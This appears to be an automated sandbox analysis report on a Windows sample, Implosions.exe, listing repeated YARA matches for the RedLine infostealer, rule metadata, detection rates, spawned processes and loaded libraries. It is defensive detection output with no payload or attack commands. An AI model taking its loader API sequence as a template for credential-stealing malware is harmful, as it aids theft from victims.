            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Detects RedLine infostealer Author: ditekSHen
            Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb Author: unknown
            Source: C:\Users\user\Desktop\Implosions.exeCode function: String function: 0040E1D8 appears 43 times
            Source: Implosions.exe, 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000003.1668313464.000000000077E000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMsMpLics.dllj% vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exe, 00000000.00000002.2911841113.0000000005BA0000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename vs Implosions.exe
            Source: Implosions.exe, 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilename_.dll4 vs Implosions.exe
            Source: Implosions.exeStatic PE information: RELOCS_STRIPPED, EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
            Source: Implosions.exe, type: SAMPLEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.0.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34e0190.6.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280f6e.2.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280086.1.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.50a0000.8.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480ee8.4.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480000.3.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480ee8.4.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280086.1.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2480000.3.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c6458.7.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.3.Implosions.exe.71b718.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.2280f6e.2.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c6458.7.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.50a0000.8.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34e0190.6.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.3.Implosions.exe.71b718.0.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 0.2.Implosions.exe.34c5570.5.raw.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 0.2.Implosions.exe.34c5570.5.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2911359259.00000000050A0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2910650053.0000000002480000.00000004.08000000.00040000.00000000.sdmp, type: MEMORYMatched rule: MALWARE_Win_RedLine snort2_sid = 920072-920073, author = ditekSHen, description = Detects RedLine infostealer, clamav_sig = MALWARE.Win.Trojan.RedLine-1, MALWARE.Win.Trojan.RedLine-2, snort3_sid = 920072-920073
            Source: 00000000.00000002.2911153997.00000000034C5000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000002.2910554766.0000000002240000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: 00000000.00000003.1668569005.000000000071B000.00000004.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: Process Memory Space: Implosions.exe PID: 7544, type: MEMORYSTRMatched rule: Windows_Trojan_RedLineStealer_f54632eb reference_sample = d82ad08ebf2c6fac951aaa6d96bdb481aa4eab3cd725ea6358b39b1045789a25, os = windows, severity = x86, creation_date = 2021-06-12, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 6a9d45969c4d58181fca50d58647511b68c1e6ee1eeac2a1838292529505a6a0, id = f54632eb-2c66-4aff-802d-ad1c076e5a5e, last_modified = 2021-08-23
            Source: classification engineClassification label: mal100.troj.winEXE@2/0@0/1
            Source: C:\Users\user\Desktop\Implosions.exeCode function: 0_2_004019F0 OleInitialize,_getenv,GetCurrentProcessId,CreateToolhelp32Snapshot,Module32First,CloseHandle,Module32Next,Module32Next,FindCloseChangeNotification,GetModuleHandleA,FindResourceA,LoadResource,LockResource,SizeofResource,_malloc,_memset,SizeofResource,_memset,KiUserExceptionDispatcher,FreeResource,_malloc,SizeofResource,_memset,LoadLibraryA,GetProcAddress,VariantInit,VariantInit,VariantInit,SafeArrayCreate,SafeArrayAccessData,SafeArrayUnaccessData,SafeArrayDestroy,SafeArrayCreateVector,VariantClear,VariantClear,VariantClear,0_2_004019F0
            Source: C:\Users\user\Desktop\Implosions.exeMutant created: NULL
            Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7552:120:WilError_03
            Source: C:\Users\user\Desktop\Implosions.exeCommand line argument: 08A0_2_00413780
            Source: Implosions.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
            Source: C:\Users\user\Desktop\Implosions.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
            Source: Implosions.exeReversingLabs: Detection: 71%
            Source: Implosions.exeVirustotal: Detection: 53%
            Source: unknownProcess created: C:\Users\user\Desktop\Implosions.exe "C:\Users\user\Desktop\Implosions.exe"
            Source: C:\Users\user\Desktop\Implosions.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: apphelp.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: mscoree.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: wldp.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: amsi.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: userenv.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: profapi.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: version.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: msasn1.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: gpapi.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\Desktop\Implosions.exeSection loaded: rsaenh.dll
